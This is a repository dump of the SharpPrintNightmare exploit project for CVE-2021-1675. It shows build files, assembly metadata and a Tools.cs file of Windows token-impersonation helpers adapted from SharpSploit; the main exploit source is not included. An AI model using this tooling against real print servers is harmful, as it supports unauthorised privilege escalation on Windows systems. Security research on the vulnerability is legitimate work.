 5 | // set of attributes. Change these attribute values to modify the information
 6 | // associated with an assembly.
 7 | [assembly: AssemblyTitle("SharpPrintNightmare")]
 8 | [assembly: AssemblyDescription("Cube0x0")]
 9 | [assembly: AssemblyConfiguration("Cube0x0")]
10 | [assembly: AssemblyCompany("Cube0x0")]
11 | [assembly: AssemblyProduct("SharpPrintNightmare")]
12 | [assembly: AssemblyCopyright("Copyright ©  2021")]
13 | [assembly: AssemblyTrademark("Cube0x0")]
14 | [assembly: AssemblyCulture("")]
15 | 
16 | // Setting ComVisible to false makes the types in this assembly not visible
17 | // to COM components.  If you need to access a type in this assembly from
18 | // COM, set the ComVisible attribute to true on that type.
19 | [assembly: ComVisible(false)]
20 | 
21 | // The following GUID is for the ID of the typelib if this project is exposed to COM
22 | [assembly: Guid("5feb114b-49ec-4652-b29e-8cb5e752ec3e")]
23 | 
24 | // Version information for an assembly consists of the following four values:
25 | //
26 | //      Major Version
27 | //      Minor Version
28 | //      Build Number
29 | //      Revision
30 | //
31 | // You can specify all the values or you can default the Build and Revision Numbers
32 | // by using the '*' as shown below:
33 | // [assembly: AssemblyVersion("1.0.*")]
34 | [assembly: AssemblyVersion("1.0.0.0")]
35 | [assembly: AssemblyFileVersion("1.0.0.0")]
36 | 


--------------------------------------------------------------------------------
/SharpPringtNightmare/SharpPrintNightmare/SharpPrintNightmare.csproj:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
 4 |   <PropertyGroup>
 5 |     <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
 6 |     <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
 7 |     <ProjectGuid>{5FEB114B-49EC-4652-B29E-8CB5E752EC3E}</ProjectGuid>
 8 |     <OutputType>Exe</OutputType>
 9 |     <RootNamespace>CVE_2021_1675</RootNamespace>
10 |     <AssemblyName>SharpPrintNightmare</AssemblyName>
11 |     <TargetFrameworkVersion>v4.5</TargetFrameworkVersion>
12 |     <FileAlignment>512</FileAlignment>
13 |     <Deterministic>true</Deterministic>
14 |   </PropertyGroup>
15 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
16 |     <PlatformTarget>AnyCPU</PlatformTarget>
17 |     <DebugSymbols>true</DebugSymbols>
18 |     <DebugType>full</DebugType>
19 |     <Optimize>false</Optimize>
20 |     <OutputPath>bin\Debug\</OutputPath>
21 |     <DefineConstants>DEBUG;TRACE</DefineConstants>
22 |     <ErrorReport>prompt</ErrorReport>
23 |     <WarningLevel>4</WarningLevel>
24 |   </PropertyGroup>
25 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
26 |     <PlatformTarget>AnyCPU</PlatformTarget>
27 |     <DebugType>pdbonly</DebugType>
28 |     <Optimize>true</Optimize>
29 |     <OutputPath>bin\Release\</OutputPath>
30 |     <DefineConstants>TRACE</DefineConstants>
31 |     <ErrorReport>prompt</ErrorReport>
32 |     <WarningLevel>4</WarningLevel>
33 |   </PropertyGroup>
34 |   <ItemGroup>
35 |     <Reference Include="System" />
36 |     <Reference Include="System.Core" />
37 |     <Reference Include="System.Xml.Linq" />
38 |     <Reference Include="System.Data.DataSetExtensions" />
39 |     <Reference Include="Microsoft.CSharp" />
40 |     <Reference Include="System.Data" />
41 |     <Reference Include="System.Net.Http" />
42 |     <Reference Include="System.Xml" />
43 |   </ItemGroup>
44 |   <ItemGroup>
45 |     <Compile Include="Program.cs" />
46 |     <Compile Include="Properties\AssemblyInfo.cs" />
47 |     <Compile Include="Tools.cs" />
48 |   </ItemGroup>
49 |   <ItemGroup>
50 |     <None Include="App.config" />
51 |   </ItemGroup>
52 |   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
53 | </Project>


--------------------------------------------------------------------------------
/SharpPringtNightmare/SharpPrintNightmare/SharpPrintNightmare.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 16
 4 | VisualStudioVersion = 16.0.31205.134
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpPrintNightmare", "SharpPrintNightmare.csproj", "{5FEB114B-49EC-4652-B29E-8CB5E752EC3E}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|Any CPU = Debug|Any CPU
11 | 		Release|Any CPU = Release|Any CPU
12 | 	EndGlobalSection
13 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | 		{5FEB114B-49EC-4652-B29E-8CB5E752EC3E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | 		{5FEB114B-49EC-4652-B29E-8CB5E752EC3E}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | 		{5FEB114B-49EC-4652-B29E-8CB5E752EC3E}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | 		{5FEB114B-49EC-4652-B29E-8CB5E752EC3E}.Release|Any CPU.Build.0 = Release|Any CPU
18 | 	EndGlobalSection
19 | 	GlobalSection(SolutionProperties) = preSolution
20 | 		HideSolutionNode = FALSE
21 | 	EndGlobalSection
22 | 	GlobalSection(ExtensibilityGlobals) = postSolution
23 | 		SolutionGuid = {11E1DC60-0FB5-4AF6-86EF-EDB693E64849}
24 | 	EndGlobalSection
25 | EndGlobal
26 | 


--------------------------------------------------------------------------------
/SharpPringtNightmare/SharpPrintNightmare/Tools.cs:
--------------------------------------------------------------------------------
  1 | using Microsoft.Win32.SafeHandles;
  2 | using System;
  3 | using System.ComponentModel;
  4 | using System.Runtime.ConstrainedExecution;
  5 | using System.Runtime.InteropServices;
  6 | using System.Security;
  7 | using System.Security.Permissions;
  8 | using System.Security.Principal;
  9 | 
 10 | 
 11 | namespace Tools
 12 | {
 13 |     public class Impersonator
 14 |     {
 15 |         //Reference https://stackoverflow.com/questions/22544903/impersonate-for-entire-application-lifecycle
 16 | 
 17 |         [PermissionSet(SecurityAction.Demand, Name = "FullTrust")]
 18 |         public class Impersonation : IDisposable
 19 |         {
 20 |             private readonly SafeTokenHandle _handle;
 21 |             private readonly WindowsImpersonationContext _context;
 22 | 
 23 |             private const int LOGON32_LOGON_NEW_CREDENTIALS = 9;
 24 | 
 25 |             public Impersonation(string domain, string username, string password)
 26 |             {
 27 |                 var ok = LogonUser(username, domain, password,
 28 |                                LOGON32_LOGON_NEW_CREDENTIALS, 0, out this._handle);
 29 |                 if (!ok)
 30 |                 {
 31 |                     var errorCode = Marshal.GetLastWin32Error();
 32 |                     throw new ApplicationException(string.Format("Could not impersonate the elevated user.  LogonUser returned error code {0}.", errorCode));
 33 |                 }
 34 | 
 35 |                 this._context = WindowsIdentity.Impersonate(this._handle.DangerousGetHandle());
 36 |             }
 37 | 
 38 |             public void Dispose()
 39 |             {
 40 |                 this._context.Dispose();
 41 |                 this._handle.Dispose();
 42 |             }
 43 | 
 44 |             [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
 45 |             private static extern bool LogonUser(String lpszUsername, String lpszDomain, String lpszPassword, int dwLogonType, int dwLogonProvider, out SafeTokenHandle phToken);
 46 | 
 47 |             public sealed class SafeTokenHandle : SafeHandleZeroOrMinusOneIsInvalid
 48 |             {
 49 |                 private SafeTokenHandle()
 50 |                     : base(true) { }
 51 | 
 52 |                 [DllImport("kernel32.dll")]
 53 |                 [ReliabilityContract(Consistency.WillNotCorruptState, Cer.Success)]
 54 |                 [SuppressUnmanagedCodeSecurity]
 55 |                 [return: MarshalAs(UnmanagedType.Bool)]
 56 |                 private static extern bool CloseHandle(IntPtr handle);
 57 | 
 58 |                 protected override bool ReleaseHandle()
 59 |                 {
 60 |                     return CloseHandle(handle);
 61 |                 }
 62 |             }
 63 |         }
 64 |     }
 65 | 
 66 |     public class AToken
 67 |     {
 68 |         // Based on SharpSploit MakeToken
 69 |         [DllImport("kernel32.dll", SetLastError = true)]
 70 |         private static extern bool CloseHandle(IntPtr hObject);
 71 | 
 72 |         [DllImport("Advapi32.dll", SetLastError = true)]
 73 |         private static extern bool RevertToSelf();
 74 | 
 75 |         [DllImport("advapi32.dll", SetLastError = true)]
 76 |         public static extern bool ImpersonateLoggedOnUser(IntPtr hToken);
 77 | 
 78 |         [DllImport("advapi32.dll", SetLastError = true)]
 79 |         public static extern bool LogonUserA(
 80 |             string lpszUsername,
 81 |             string lpszDomain,
 82 |             string lpszPassword,
 83 |             LOGON_TYPE dwLogonType,
 84 |             LOGON_PROVIDER dwLogonProvider,
 85 |             ref IntPtr phToken);
 86 | 
 87 |         [Flags]
 88 |         public enum LOGON_TYPE : uint
 89 |         {
 90 |             LOGON32_LOGON_INTERACTIVE = 2, //will not work for sacrify, still active
 91 |             LOGON32_LOGON_NETWORK, //will not work for sacrify, still active
 92 |             LOGON32_LOGON_BATCH, //will not work for sacrify, still active
 93 |             LOGON32_LOGON_SERVICE, //will not work for sacrify, still active
 94 |             LOGON32_LOGON_UNLOCK = 7, //will not work for sacrify, still active
 95 |             LOGON32_LOGON_NETWORK_CLEARTEXT, //will not work for sacrify, still active
 96 |             LOGON32_LOGON_NEW_CREDENTIALS
 97 |         }
 98 | 
 99 |         [Flags]
100 |         public enum LOGON_PROVIDER : uint
101 |         {
102 |             LOGON32_PROVIDER_DEFAULT,
103 |             LOGON32_PROVIDER_WINNT35,
104 |             LOGON32_PROVIDER_WINNT40,
105 |             LOGON32_PROVIDER_WINNT50
106 |         }
107 | 
108 |         public static bool MakeToken(string Username, string Domain, string Password, LOGON_TYPE LogonType = LOGON_TYPE.LOGON32_LOGON_NEW_CREDENTIALS)
109 |         {
110 |             IntPtr hProcessToken = IntPtr.Zero;
111 |             if (!LogonUserA(
112 |                 Username, Domain, Password,
113 |                 LogonType,
114 |                 LOGON_PROVIDER.LOGON32_PROVIDER_WINNT50,
115 |                 ref hProcessToken))
116 |             {
117 |                 Console.Error.WriteLine("LogonUserA() Error: " + new Win32Exception(Marshal.GetLastWin32Error()).Message);
118 |                 return false;
119 |             }
120 | 
121 |             if (!ImpersonateLoggedOnUser(hProcessToken))
122 |             {
123 |                 Console.Error.WriteLine("ImpersonateLoggedOnUser() Error: " + new Win32Exception(Marshal.GetLastWin32Error()).Message);
124 |                 CloseHandle(hProcessToken);
125 |                 return false;
126 |             }
127 |             return true;
128 |         }
129 | 
130 |         public static bool RevertFromToken()
131 |         {
132 |             if (!RevertToSelf())
133 |             {
134 |                 Console.Error.WriteLine("RevertToSelf() Error: " + new Win32Exception(Marshal.GetLastWin32Error()).Message);
135 |                 return false;
136 |             }
137 |             return true;
138 |         }
139 |     }
140 | }


--------------------------------------------------------------------------------
/SharpPringtNightmare/SharpPrintNightmare/obj/Release/SharpPrintNightmare.csproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nathanealm/PrintNightmare-Exploit/999c91763f029563618d36f53cdb626ef5017567/SharpPringtNightmare/SharpPrintNightmare/obj/Release/SharpPrintNightmare.csproj.FileListAbsolute.txt


--------------------------------------------------------------------------------